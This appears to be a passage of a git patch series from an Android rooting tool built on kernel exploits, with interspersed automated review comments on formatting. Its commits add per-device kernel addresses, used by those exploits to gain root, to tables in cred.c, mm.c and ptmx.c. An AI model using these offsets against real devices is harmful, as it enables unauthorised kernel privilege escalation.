From 6ab243abb101d1295ad8f9c55ade3c96bc8708f8 Mon Sep 17 00:00:00 2001
From: Hiroyuki Ikezoe
Date: Thu, 20 Jun 2013 18:24:02 +0900
Subject: [PATCH 001/125] Change libperf_event_exploit path
---
 .gitmodules | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.gitmodules b/.gitmodules
index fb45603..492b619 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -6,7 +6,7 @@
 url = git://github.com/fi01/android_device_database.git
 [submodule "libperf_event_exploit"]
 path = libperf_event_exploit
- url = git://github.com/hiikezoe/libperf_event_exploit.git
+ url = git://github.com/android-rooting-tools/libperf_event_exploit.git
 [submodule "libmsm_acdb_exploit"]
 path = libmsm_acdb_exploit
 url = git://github.com/fi01/libmsm_acdb_exploit.git
From fd4c49dbf59a77e3243338cb74f19d8fcbf43102 Mon Sep 17 00:00:00 2001
From: fi01
Date: Fri, 21 Jun 2013 14:18:57 +0900
Subject: [PATCH 002/125] Change android_device_database path
---
 .gitmodules | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.gitmodules b/.gitmodules
index 492b619..46c8151 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -3,7 +3,7 @@
 url = git://github.com/hiikezoe/libdiagexploit.git
 [submodule "device_database"]
 path = device_database
- url = git://github.com/fi01/android_device_database.git
+ url = git://github.com/android-rooting-tools/android_device_database.git
 [submodule "libperf_event_exploit"]
 path = libperf_event_exploit
 url = git://github.com/android-rooting-tools/libperf_event_exploit.git
From 8e553d208a02e4b5e27f6cd45e9f8487bb254089 Mon Sep 17 00:00:00 2001
From: fi01
Date: Wed, 19 Jun 2013 14:34:09 +0900
Subject: [PATCH 003/125] Support SC-01E and SC-04E Adjust build version for SCL21
---
 cred.c | 3 +++
 device_database | 2 +-
 libperf_event_exploit | 2 +-
 mm.c | 3 +++
 ptmx.c | 5 ++++-
 5 files changed, 12 insertions(+), 3 deletions(-)
diff --git a/cred.c b/cred.c
index 0ca2847..0ceda5f 100644
--- a/cred.c
+++ b/cred.c
@@ -23,6 +23,9 @@ typedef struct _supported_device {
 static supported_device supported_devices[] = {
 { DEVICE_IS17SH_01_00_04, 0xc01c66a8, 0xc01c5fd8 },
+ { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c },
+ { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 },
+ { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc },
 { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 },
 { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 },
 { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 },
diff --git a/device_database b/device_database
index 1b2c303..2b33bdf 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 1b2c30320832cbe36805b3b15a0f7a15a285b499
+Subproject commit 2b33bdf90d758e4bc1a37d5de6df121171c8bd29
diff --git a/libperf_event_exploit b/libperf_event_exploit
index fb38536..b188927 160000
--- a/libperf_event_exploit
+++ b/libperf_event_exploit
@@ -1 +1 @@
-Subproject commit fb38536b9868e9ff662ec7c21f595536770f8b4c
+Subproject commit b188927cc829671b6dd3f0f15c927b63bbf2899b
diff --git a/mm.c b/mm.c
index 601012e..a499dfa 100644
--- a/mm.c
+++ b/mm.c
@@ -9,6 +9,9 @@ typedef struct _supported_device {
 static supported_device supported_devices[] = {
 { DEVICE_IS17SH_01_00_04, 0xc0208a34 },
+ { DEVICE_SC01E_LJ3, 0xc0192124 },
+ { DEVICE_SC04E_MDI, 0xc011383c },
+ { DEVICE_SC04E_MF1, 0xc01138a4 },
 { DEVICE_SH04E_01_00_02, 0xc00e458c },
 { DEVICE_SH04E_01_00_03, 0xc00e46bc },
 { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 },
diff --git a/ptmx.c b/ptmx.c
index ef093e3..418e802 100644
--- a/ptmx.c
+++ b/ptmx.c
@@ -12,7 +12,10 @@ static supported_device supported_devices[] = {
 { DEVICE_F11D_V24R40A, 0xc1056998 },
 { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 },
- { DEVICE_SCL21_KDALJD, 0xc0c71dc0 },
+ { DEVICE_SCL21_LJD, 0xc0c71dc0 },
+ { DEVICE_SC01E_LJ3, 0xc10a5a48 },
+ { DEVICE_SC04E_MDI, 0xc1169808 },
+ { DEVICE_SC04E_MF1, 0xc1169848 },
 // ISW13F: Fujitsu added a method in struct file_operations
 { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 },
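Review bot: The rows added to all three tables are bare (device, address) pairs, so nothing in the source records what each address column denotes or which kernel build a value was taken from; the only annotated entries are the `+ 4` rows in ptmx.c (`// ISW13F: Fujitsu added a method in struct file_operations`). A one-line comment at the head of each table naming the column's meaning would let a reviewer check a new row against its origin instead of taking it on trust, and nothing visible in this series catches a wrong row before it is used. The ptmx.c hunk also renames `DEVICE_SCL21_KDALJD` to `DEVICE_SCL21_LJD`, which presumably only resolves against the device_database submodule bumped in the same commit, so the rename and the submodule pointer should not be separated later. Each table's closing `};` lies outside these hunks.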
From fba7cb4f5232e0c28c58a57ccceccb331b0113dd Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 21 Jun 2013 14:57:39 +0900 Subject: [PATCH 004/125] Support SGP312 10.1.C.0.370 Support SO-02E 10.1.D.0.343 Support SO-03E 10.1.E.0.265 Support SO-03E 10.1.E.0.269 Support SO-04E 10.1.1.D.0.179 Support SOL22 10.2.F.3.43 --- cred.c | 40 ++++++++++++++++++------------- device_database | 2 +- libdiagexploit | 2 +- libperf_event_exploit | 2 +- mm.c | 40 ++++++++++++++++++------------- ptmx.c | 56 ++++++++++++++++++++++++------------------- 6 files changed, 80 insertions(+), 62 deletions(-) diff --git a/cred.c b/cred.c index 0ceda5f..f3433ad 100644 --- a/cred.c +++ b/cred.c 
@@ -22,23 +22,29 @@ typedef struct _supported_device { } supported_device; static supported_device supported_devices[] = { - { DEVICE_IS17SH_01_00_04, 0xc01c66a8, 0xc01c5fd8 }, - { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, - { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, - { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, - { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, - { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, - { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc0098584, 0xc00980a8 }, - { DEVICE_HTL21_1_29_970_1, 0xc00ab9d8, 0xc00ab4c4 }, - { DEVICE_HTL22_1_05_970_1, 0xc00b2688, 0xc00b2174 }, - { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, - { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, - { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc } + { DEVICE_IS17SH_01_00_04, 0xc01c66a8, 0xc01c5fd8 }, + { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, + { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, + { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, + { DEVICE_SGP312_10_1_C_0_370, 0xc009363c, 0xc0093160 }, + { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, + { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, + { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 }, + { DEVICE_SO02E_10_1_D_0_343, 0xc009ca34, 0xc009c558 }, + { DEVICE_SO03E_10_1_E_0_265, 0xc00938a0, 0xc00933c4 }, + { DEVICE_SO03E_10_1_E_0_269, 0xc00938b0, 0xc00933d4 }, + { DEVICE_SO04E_10_1_1_D_0_179, 0xc009d500, 0xc009d024 }, + { DEVICE_SOL21_9_1_D_0_395, 0xc0098584, 0xc00980a8 }, + { DEVICE_SOL22_10_2_F_3_43, 0xc009d3f8, 0xc009cf1c }, + { DEVICE_HTL21_1_29_970_1, 0xc00ab9d8, 0xc00ab4c4 }, + { DEVICE_HTL22_1_05_970_1, 0xc00b2688, 0xc00b2174 }, + { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c 
}, + { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, + { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, + { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, + { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); diff --git a/device_database b/device_database index 2b33bdf..38b89c2 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 2b33bdf90d758e4bc1a37d5de6df121171c8bd29 +Subproject commit 38b89c2875f4fdfe39df6e98d625a345181103cb diff --git a/libdiagexploit b/libdiagexploit index 80d0ad5..5ee183b 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 80d0ad59f3a271fa69a2c978de60407bbace4f9d +Subproject commit 5ee183b31d4928315a0d7b171680b0ae9b1a7d9c diff --git a/libperf_event_exploit b/libperf_event_exploit index b188927..b21caa8 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit b188927cc829671b6dd3f0f15c927b63bbf2899b +Subproject commit b21caa8851473550709f1c664aac919226b9c94b diff --git a/mm.c b/mm.c index a499dfa..837e438 100644 --- a/mm.c +++ b/mm.c 
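Review bot: Every pre-existing row of the cred.c table is removed and re-added only to change its column alignment, so the six genuinely new rows (SGP312, SO02E, the two SO03E builds, SO04E, SOL22) are buried in seventeen lines of whitespace churn; the mm.c and ptmx.c hunks of this commit do the same. Landing the re-alignment as its own commit, or keeping the old alignment and inserting the rows, would leave a diff that shows only the data that changed and can be reviewed with the addresses side by side. The trailing comma now placed after the last row, `{ DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc },`, is a good change, since the next addition no longer has to touch the previous line. The typedef the table relies on starts above the hunk.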
@@ -8,23 +8,29 @@ typedef struct _supported_device { } supported_device; static supported_device supported_devices[] = { - { DEVICE_IS17SH_01_00_04, 0xc0208a34 }, - { DEVICE_SC01E_LJ3, 0xc0192124 }, - { DEVICE_SC04E_MDI, 0xc011383c }, - { DEVICE_SC04E_MF1, 0xc01138a4 }, - { DEVICE_SH04E_01_00_02, 0xc00e458c }, - { DEVICE_SH04E_01_00_03, 0xc00e46bc }, - { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc010e33c }, - { DEVICE_HTL21_1_29_970_1, 0xc00ff32c }, - { DEVICE_HTL22_1_05_970_1, 0xc0128b10 }, - { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, - { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, - { DEVICE_N05E_A1000311, 0xc0105800 } + { DEVICE_IS17SH_01_00_04, 0xc0208a34 }, + { DEVICE_SC01E_LJ3, 0xc0192124 }, + { DEVICE_SC04E_MDI, 0xc011383c }, + { DEVICE_SC04E_MF1, 0xc01138a4 }, + { DEVICE_SGP312_10_1_C_0_370, 0xc01090fc }, + { DEVICE_SH04E_01_00_02, 0xc00e458c }, + { DEVICE_SH04E_01_00_03, 0xc00e46bc }, + { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, + { DEVICE_SO02E_10_1_D_0_343, 0xc01124f4 }, + { DEVICE_SO03E_10_1_E_0_265, 0xc0109360 }, + { DEVICE_SO03E_10_1_E_0_269, 0xc0109370 }, + { DEVICE_SO04E_10_1_1_D_0_179, 0xc0112fc0 }, + { DEVICE_SOL21_9_1_D_0_395, 0xc010e33c }, + { DEVICE_SOL22_10_2_F_3_43, 0xc0112230 }, + { DEVICE_HTL21_1_29_970_1, 0xc00ff32c }, + { DEVICE_HTL22_1_05_970_1, 0xc0128b10 }, + { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, + { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, + { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, + { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, + { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, + { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, + { DEVICE_N05E_A1000311, 0xc0105800 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); 
diff --git a/ptmx.c b/ptmx.c index 418e802..8b0dcf3 100644 --- a/ptmx.c +++ b/ptmx.c 
@@ -8,35 +8,41 @@ typedef struct _supported_device { static supported_device supported_devices[] = { // F10D: Fujitsu added a method in struct file_operations - { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, + { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, - { DEVICE_F11D_V24R40A, 0xc1056998 }, - { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, - { DEVICE_SCL21_LJD, 0xc0c71dc0 }, - { DEVICE_SC01E_LJ3, 0xc10a5a48 }, - { DEVICE_SC04E_MDI, 0xc1169808 }, - { DEVICE_SC04E_MF1, 0xc1169848 }, + { DEVICE_F11D_V24R40A, 0xc1056998 }, + { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, + { DEVICE_SCL21_LJD, 0xc0c71dc0 }, + { DEVICE_SC01E_LJ3, 0xc10a5a48 }, + { DEVICE_SC04E_MDI, 0xc1169808 }, + { DEVICE_SC04E_MF1, 0xc1169848 }, // ISW13F: Fujitsu added a method in struct file_operations - { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, + { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, - { DEVICE_IS17SH_01_00_04, 0xc0edae90 }, - { DEVICE_SONYTABLET_S_RELEASE5A, 0xc06e4d18 }, - { DEVICE_SONYTABLET_P_RELEASE5A, 0xc06e6da0 }, - { DEVICE_SH04E_01_00_02, 0xc0eed190 }, - { DEVICE_SH04E_01_00_03, 0xc0eed190 }, - { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, - { DEVICE_SO04D_7_0_D_1_137, 0xc0c9d8a0 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 }, - { DEVICE_HTL21_1_29_970_1, 0xc0d1d944 }, - { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, - { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, - { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, - { DEVICE_N05E_A1000311, 0xc0f58700 }, + { DEVICE_IS17SH_01_00_04, 0xc0edae90 }, + { DEVICE_SONYTABLET_S_RELEASE5A, 0xc06e4d18 }, + { DEVICE_SONYTABLET_P_RELEASE5A, 0xc06e6da0 }, + { DEVICE_SH04E_01_00_02, 0xc0eed190 }, + { DEVICE_SH04E_01_00_03, 0xc0eed190 }, + { DEVICE_SGP312_10_1_C_0_370, 0xc0d35ca8 }, + { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, + { DEVICE_SO02E_10_1_D_0_343, 0xc0e38620 }, + { 
DEVICE_SO03E_10_1_E_0_265, 0xc0d36aa8 }, + { DEVICE_SO03E_10_1_E_0_269, 0xc0d36aa8 }, + { DEVICE_SO04D_7_0_D_1_137, 0xc0c9d8a0 }, + { DEVICE_SO04E_10_1_1_D_0_179, 0xc0f392d8 }, + { DEVICE_SOL22_10_2_F_3_43, 0xc0e389b0 }, + { DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 }, + { DEVICE_HTL21_1_29_970_1, 0xc0d1d944 }, + { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, + { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, + { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, + { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, + { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, + { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, + { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_N05E_A1000311, 0xc0f58700 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From b498c0d456e7c1ca8bc0d558f97605ba6332e4a7 Mon Sep 17 00:00:00 2001 From: Phungsuk Wangdu Date: Thu, 20 Jun 2013 11:02:16 +0530 Subject: [PATCH 005/125] Added support for device Sony Xperia Z (DEVICE_C6603_1275_1562_10_1_1_A_1_253) --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index f3433ad..54b96c2 100644 --- a/cred.c +++ b/cred.c @@ -43,6 +43,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index 38b89c2..596df91 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 38b89c2875f4fdfe39df6e98d625a345181103cb +Subproject commit 596df91dd68e68deea03ed3ed04dbc11355298d4 
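Review bot: The ptmx.c table places `{ DEVICE_SOL22_10_2_F_3_43, 0xc0e389b0 },` ahead of `{ DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 },`, whereas the cred.c and mm.c tables in the same commit list SOL21 before SOL22; since a device is added to all three files together, keeping the rows in one order makes the cross-check a line-by-line comparison rather than a search. The two SO03E rows here carry the same value `0xc0d36aa8`, while their cred.c and mm.c counterparts differ by 0x10 between the .265 and .269 builds; that may well be correct, but a short comment on such pairs (the SH04E pair above has the same shape) would stop a reader from treating them as a copy-paste slip. This hunk also repeats the whole-table re-alignment already noted on the cred.c hunk of this commit.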
diff --git a/libperf_event_exploit b/libperf_event_exploit index b21caa8..a08a5fc 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit b21caa8851473550709f1c664aac919226b9c94b +Subproject commit a08a5fc4607d80b57b0140aac7d4a75ecf3acc62 diff --git a/mm.c b/mm.c index 837e438..6cdacf4 100644 --- a/mm.c +++ b/mm.c @@ -29,6 +29,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, + { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0109894 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index 8b0dcf3..0dcca72 100644 --- a/ptmx.c +++ b/ptmx.c @@ -41,6 +41,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, + { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0d37488 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 153d8baa38267bf44b826f9e6cb488b1d8ed6b48 Mon Sep 17 00:00:00 2001 From: Phungsuk Wangdu Date: Thu, 20 Jun 2013 12:00:20 +0530 Subject: [PATCH 006/125] Added support for device LG Optimus G E975 (DEVICE_LG_E975_V10e) --- cred.c | 1 + mm.c | 1 + ptmx.c | 1 + 3 files changed, 3 insertions(+) diff --git a/cred.c b/cred.c index 54b96c2..339cc8e 100644 --- a/cred.c +++ b/cred.c 
@@ -40,6 +40,7 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_05_970_1, 0xc00b2688, 0xc00b2174 }, { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, + { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, diff --git a/mm.c b/mm.c index 6cdacf4..f574028 100644 --- a/mm.c +++ b/mm.c @@ -26,6 +26,7 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_05_970_1, 0xc0128b10 }, { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, + { DEVICE_LG_E975_V10e, 0xc0116598 }, { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index 0dcca72..f1f73a7 100644 --- a/ptmx.c +++ b/ptmx.c @@ -38,6 +38,7 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, + { DEVICE_LG_E975_V10e, 0xc0f9da70 }, { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, From ddebffde339692566e5b1bbc4a4bece24098ed39 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Fri, 21 Jun 2013 18:42:01 +0530 Subject: [PATCH 007/125] added support for Xperia ZL (C6503) - 10.3.A.0.423 - 1266-7597 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 339cc8e..68a9c24 100644 --- a/cred.c +++ b/cred.c 
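Review bot: `DEVICE_LG_E975_V10e` is the first identifier in these tables with a lowercase letter; every other entry is upper-case even where the firmware label is not, e.g. `DEVICE_LT26I_1257_8080_6_2_B_0_211`, and the later `DEVICE_LT29i_9_1_B_1_67` row in this series repeats the pattern. The names are presumably declared in the device_database submodule, so the rename (`DEVICE_LG_E975_V10E`) belongs there, but while they stay mixed-case a search for `_V10E` or `LT29I` silently misses these devices. The three hunks of this commit are otherwise consistent with each other, inserting the row at the same position in each table.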
@@ -46,6 +46,7 @@ static supported_device supported_devices[] = { { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index 596df91..cfe53a1 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 596df91dd68e68deea03ed3ed04dbc11355298d4 +Subproject commit cfe53a12337be22840aa89bde75f816d38d0a35f diff --git a/libperf_event_exploit b/libperf_event_exploit index a08a5fc..8e80cbc 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit a08a5fc4607d80b57b0140aac7d4a75ecf3acc62 +Subproject commit 8e80cbce0d3cf8b1856a0e4dadceecd0ae216bd3 diff --git a/mm.c b/mm.c index f574028..70c0098 100644 --- a/mm.c +++ b/mm.c @@ -32,6 +32,7 @@ static supported_device supported_devices[] = { { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0109894 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, + { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc0112668 }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index f1f73a7..1c85e78 100644 --- a/ptmx.c +++ b/ptmx.c @@ -44,6 +44,7 @@ static supported_device supported_devices[] = { { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0d37488 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 9616a0abcc08a2758eb8aed9c3706abb5662d12b Mon Sep 17 00:00:00 2001 
From: DooMLoRD Date: Sat, 22 Jun 2013 03:35:50 +0530 Subject: [PATCH 008/125] added support for Xperia Tablet Z (SGP321) - 10.1.1.A.1.307 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 68a9c24..7819b2f 100644 --- a/cred.c +++ b/cred.c @@ -26,6 +26,7 @@ static supported_device supported_devices[] = { { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, + { DEVICE_SGP321_10_1_1_A_1_307, 0xc0094124, 0xc0093c48 }, { DEVICE_SGP312_10_1_C_0_370, 0xc009363c, 0xc0093160 }, { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, diff --git a/device_database b/device_database index cfe53a1..a19bf5d 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit cfe53a12337be22840aa89bde75f816d38d0a35f +Subproject commit a19bf5d0a1132c49fd3ff6716f8cc133366d79cc diff --git a/libperf_event_exploit b/libperf_event_exploit index 8e80cbc..dad23e6 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 8e80cbce0d3cf8b1856a0e4dadceecd0ae216bd3 +Subproject commit dad23e6fd4671cdf1c45107796792811f22d451b diff --git a/mm.c b/mm.c index 70c0098..3f39a99 100644 --- a/mm.c +++ b/mm.c @@ -12,6 +12,7 @@ static supported_device supported_devices[] = { { DEVICE_SC01E_LJ3, 0xc0192124 }, { DEVICE_SC04E_MDI, 0xc011383c }, { DEVICE_SC04E_MF1, 0xc01138a4 }, + { DEVICE_SGP321_10_1_1_A_1_307, 0xc0109be4 }, { DEVICE_SGP312_10_1_C_0_370, 0xc01090fc }, { DEVICE_SH04E_01_00_02, 0xc00e458c }, { DEVICE_SH04E_01_00_03, 0xc00e46bc }, diff --git a/ptmx.c b/ptmx.c index 1c85e78..d37cdbc 100644 --- a/ptmx.c +++ b/ptmx.c 
